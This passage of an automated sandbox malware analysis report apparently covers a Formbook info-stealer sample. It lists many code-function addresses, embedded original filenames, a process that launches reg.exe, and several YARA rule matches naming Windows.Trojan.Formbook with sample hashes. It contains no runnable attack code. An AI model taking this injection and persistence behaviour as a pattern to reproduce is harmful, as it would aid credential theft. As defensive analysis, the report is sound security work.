            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E516C8_2_017E516C
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017BB1B08_2_017BB1B0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0187B16B8_2_0187B16B
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0185F0CC8_2_0185F0CC
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0186F0E08_2_0186F0E0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018670E98_2_018670E9
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B70C08_2_017B70C0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0179D34C8_2_0179D34C
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0186132D8_2_0186132D
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017F739A8_2_017F739A
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018512ED8_2_018512ED
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017CD2F08_2_017CD2F0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017CB2C08_2_017CB2C0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B52A08_2_017B52A0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0184D5B08_2_0184D5B0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018795C38_2_018795C3
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018675718_2_01867571
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A14608_2_017A1460
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0186F43F8_2_0186F43F
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0186F7B08_2_0186F7B0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018616CC8_2_018616CC
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017F56308_2_017F5630
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B99508_2_017B9950
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017CB9508_2_017CB950
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018459108_2_01845910
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0181D8008_2_0181D800
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B38E08_2_017B38E0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01825BF08_2_01825BF0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017EDBF98_2_017EDBF9
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0186FB768_2_0186FB76
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017CFB808_2_017CFB80
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01851AA38_2_01851AA3
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0184DAAC8_2_0184DAAC
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0185DAC68_2_0185DAC6
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01867A468_2_01867A46
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0186FA498_2_0186FA49
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017F5AA08_2_017F5AA0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01823A6C8_2_01823A6C
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B3D408_2_017B3D40
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017CFDC08_2_017CFDC0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01861D5A8_2_01861D5A
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01867D738_2_01867D73
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0186FCF28_2_0186FCF2
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01829C328_2_01829C32
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0186FFB18_2_0186FFB1
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0186FF098_2_0186FF09
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01773FD58_2_01773FD5
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01773FD28_2_01773FD2
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B1F928_2_017B1F92
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B9EB08_2_017B9EB0
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 9_2_00B0D5BC9_2_00B0D5BC
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0112010015_2_01120100
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0111F17215_2_0111F172
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0116516C15_2_0116516C
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0113B1B015_2_0113B1B0
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0111D34C15_2_0111D34C
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_011333F315_2_011333F3
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_011352A015_2_011352A0
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0114B2C015_2_0114B2C0
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_011B02C015_2_011B02C0
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0114D2F015_2_0114D2F0
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0113053515_2_01130535
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0112146015_2_01121460
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0113349715_2_01133497
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0113B73015_2_0113B730
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0115475015_2_01154750
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0113077015_2_01130770
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0112C7C015_2_0112C7C0
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0114C6E015_2_0114C6E0
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0113995015_2_01139950
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0114B95015_2_0114B950
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0114696215_2_01146962
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0113599015_2_01135990
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_011329A015_2_011329A0
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0119D80015_2_0119D800
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0113A84015_2_0113A840
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0113284015_2_01132840
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0116889015_2_01168890
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_011168B815_2_011168B8
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0115E8F015_2_0115E8F0
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0114FB8015_2_0114FB80
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_011A5BF015_2_011A5BF0
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0116DBF915_2_0116DBF9
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_011A3A6C15_2_011A3A6C
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0112EA8015_2_0112EA80
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0113AD0015_2_0113AD00
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_01133D4015_2_01133D40
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0113ED7A15_2_0113ED7A
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_01148DBF15_2_01148DBF
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_01138DC015_2_01138DC0
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0114FDC015_2_0114FDC0
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0112ADE015_2_0112ADE0
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_01130C0015_2_01130C00
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_011A9C3215_2_011A9C32
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_01149C2015_2_01149C20
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_01120CF215_2_01120CF2
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_01150F3015_2_01150F30
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_01172F2815_2_01172F28
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_011A4F4015_2_011A4F40
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_01131F9215_2_01131F92
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_011AEFA015_2_011AEFA0
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_01122FC815_2_01122FC8
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_01130E5915_2_01130E59
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_01142E9015_2_01142E90
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_01139EB015_2_01139EB0
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0042DC2315_2_0042DC23
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0361A35217_2_0361A352
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_036203E617_2_036203E6
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0356E3F017_2_0356E3F0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0360027417_2_03600274
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_035E02C017_2_035E02C0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_035E815817_2_035E8158
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_035FA11817_2_035FA118
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0355010017_2_03550100
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_036181CC17_2_036181CC
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_036141A217_2_036141A2
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_036201AA17_2_036201AA
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_035F200017_2_035F2000
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0358475017_2_03584750
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0356077017_2_03560770
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0355C7C017_2_0355C7C0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0357C6E017_2_0357C6E0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0356053517_2_03560535
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0362059117_2_03620591
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0361244617_2_03612446
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0360442017_2_03604420
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0360E4F617_2_0360E4F6
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0361AB4017_2_0361AB40
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03616BD717_2_03616BD7
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0355EA8017_2_0355EA80
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0357696217_2_03576962
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0362A9A617_2_0362A9A6
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_035629A017_2_035629A0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0356284017_2_03562840
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0356A84017_2_0356A840
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0358E8F017_2_0358E8F0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_035468B817_2_035468B8
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_035D4F4017_2_035D4F40
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03602F3017_2_03602F30
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03580F3017_2_03580F30
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_035A2F2817_2_035A2F28
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03552FC817_2_03552FC8
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_035DEFA017_2_035DEFA0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03560E5917_2_03560E59
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0361EE2617_2_0361EE26
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0361EEDB17_2_0361EEDB
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03572E9017_2_03572E90
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0361CE9317_2_0361CE93
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_035FCD1F17_2_035FCD1F
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0356AD0017_2_0356AD00
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0355ADE017_2_0355ADE0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03578DBF17_2_03578DBF
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03560C0017_2_03560C00
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03550CF217_2_03550CF2
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03600CB517_2_03600CB5
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0354D34C17_2_0354D34C
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0361132D17_2_0361132D
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_035A739A17_2_035A739A
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_036012ED17_2_036012ED
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0357B2C017_2_0357B2C0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0357D2F017_2_0357D2F0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_035652A017_2_035652A0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0362B16B17_2_0362B16B
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0354F17217_2_0354F172
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0359516C17_2_0359516C
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0356B1B017_2_0356B1B0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0361F0E017_2_0361F0E0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_036170E917_2_036170E9
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_035670C017_2_035670C0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0360F0CC17_2_0360F0CC
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0361F7B017_2_0361F7B0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_035A563017_2_035A5630
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_036116CC17_2_036116CC
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0361757117_2_03617571
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_036295C317_2_036295C3
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_035FD5B017_2_035FD5B0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0355146017_2_03551460
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0361F43F17_2_0361F43F
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0361FB7617_2_0361FB76
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0359DBF917_2_0359DBF9
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_035D5BF017_2_035D5BF0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0357FB8017_2_0357FB80
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03617A4617_2_03617A46
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0361FA4917_2_0361FA49
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_035D3A6C17_2_035D3A6C
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0360DAC617_2_0360DAC6
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03601AA317_2_03601AA3
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_035FDAAC17_2_035FDAAC
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_035A5AA017_2_035A5AA0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0356995017_2_03569950
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0357B95017_2_0357B950
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_035F591017_2_035F5910
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_035CD80017_2_035CD800
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_035638E017_2_035638E0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0361FF0917_2_0361FF09
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03523FD217_2_03523FD2
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03523FD517_2_03523FD5
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03561F9217_2_03561F92
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0361FFB117_2_0361FFB1
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03569EB017_2_03569EB0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03617D7317_2_03617D73
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03563D4017_2_03563D40
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03611D5A17_2_03611D5A
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0357FDC017_2_0357FDC0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_035D9C3217_2_035D9C32
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0361FCF217_2_0361FCF2
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_02CE1B6017_2_02CE1B60
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_02CFA6B017_2_02CFA6B0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_02CDCF9017_2_02CDCF90
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_02CDCD7017_2_02CDCD70
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_02CDB01017_2_02CDB010
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_02CE36AB17_2_02CE36AB
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_02CE36B017_2_02CE36B0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0342B0E817_2_0342B0E8
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0342C08317_2_0342C083
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0342BBC417_2_0342BBC4
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0342BCE617_2_0342BCE6
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: String function: 0119EA12 appears 36 times
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: String function: 01177E54 appears 96 times
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: String function: 0179B970 appears 262 times
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: String function: 017E5130 appears 58 times
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: String function: 0182F290 appears 103 times
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: String function: 017F7E54 appears 107 times
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: String function: 0181EA12 appears 86 times
            Source: C:\Windows\SysWOW64\reg.exeCode function: String function: 035A7E54 appears 107 times
            Source: C:\Windows\SysWOW64\reg.exeCode function: String function: 035CEA12 appears 86 times
            Source: C:\Windows\SysWOW64\reg.exeCode function: String function: 03595130 appears 58 times
            Source: C:\Windows\SysWOW64\reg.exeCode function: String function: 0354B970 appears 262 times
            Source: C:\Windows\SysWOW64\reg.exeCode function: String function: 035DF290 appears 103 times
            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1696965309.00000000009FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs jlsvOH1c8bSRKqM.exe
            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1717063063.00000000050D0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRT.dll. vs jlsvOH1c8bSRKqM.exe
            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1722685780.0000000006E3B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs jlsvOH1c8bSRKqM.exe
            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1697199208.0000000000C30000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs jlsvOH1c8bSRKqM.exe
            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1697745017.00000000026B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRT.dll. vs jlsvOH1c8bSRKqM.exe
            Source: jlsvOH1c8bSRKqM.exe, 00000008.00000002.1861652311.00000000012AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamereg.exej% vs jlsvOH1c8bSRKqM.exe
            Source: jlsvOH1c8bSRKqM.exe, 00000008.00000002.1861652311.0000000001248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamereg.exej% vs jlsvOH1c8bSRKqM.exe
            Source: jlsvOH1c8bSRKqM.exe, 00000008.00000002.1861898631.000000000189D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs jlsvOH1c8bSRKqM.exe
            Source: jlsvOH1c8bSRKqM.exeBinary or memory string: OriginalFilenameZxNe.exeL vs jlsvOH1c8bSRKqM.exe
            Source: jlsvOH1c8bSRKqM.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\SysWOW64\reg.exe"
            Source: 8.2.jlsvOH1c8bSRKqM.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 8.2.jlsvOH1c8bSRKqM.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000011.00000002.4128079156.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000017.00000002.4131641803.00000000054B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.1861489687.00000000011D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000011.00000002.4129728569.0000000003290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
